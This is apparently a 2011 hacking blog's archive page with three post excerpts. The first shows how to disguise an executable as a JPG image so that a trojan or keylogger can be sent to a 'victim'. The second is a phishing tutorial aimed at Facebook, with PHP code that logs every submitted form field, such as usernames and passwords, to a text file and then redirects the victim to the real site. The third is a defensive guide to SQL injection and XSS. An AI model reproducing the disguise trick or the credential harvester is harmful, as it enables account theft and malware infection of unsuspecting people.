Posts

Showing posts from July, 2011

Hide EXE File into JPG

Image
This is a good trick to hide your exe files into a jpg file..! How about sending a trojan or a keylogger into your victim using this trick..?? 1)  Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see hidden files and see the extension of all your files on your pc. 2)  Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it) 3)  Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg' 4)  Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES. 5)  Now create a shortcut of this 'picture.jpeg' in the same folder. 6)  Now that you have a shortcut, rename it to whatever you want, for e...

Phishing Tutorial (1)

Image
Today I put togeather a little phishing tutorial for those who dont know how to make one. Follow these simple steps and soon enough you'll be phishing any site you want. I used facebook as an example. 1.Start out by gathering all the files you will need. (Post.php and and index file) Post.php-Open up notepad, and type or paste in the following code header ('Location: Link here'); $handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> Were it says you're link here type in the link of the page you want to get passwords for (example) header ('Location:  www.facebook.com'); $handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); f...

How to Protect Your Website from Hacking Attacks

If you are a website owner or developer, you are probably aware of the threat of hackers. There are many ways to protect your database-driven ASP or PHP website from hacker attacks, ranging from weak to strong security measures. Here you will learn about the most common and effective ways to slow down hackers who use methods like SQL injection attacks and XSS (cross-site scripting) via the URL querystring and form inputs. Two general types of hacker blocking techniques are discussed, including custom error pages and input validation. These methods are simple enough that you can do it yourself with only basic coding knowledge. Your best strategy would be to put up a combination of as many little obstacles as possible. Steps 1 SQL database-driven websites are at risk . 2 Any web page which passes parameters to a database can be vulnerable to attacks . This includes e-commerce shopping carts or any other website that has a form for login, search, etc. Any SQL database-driven website is ...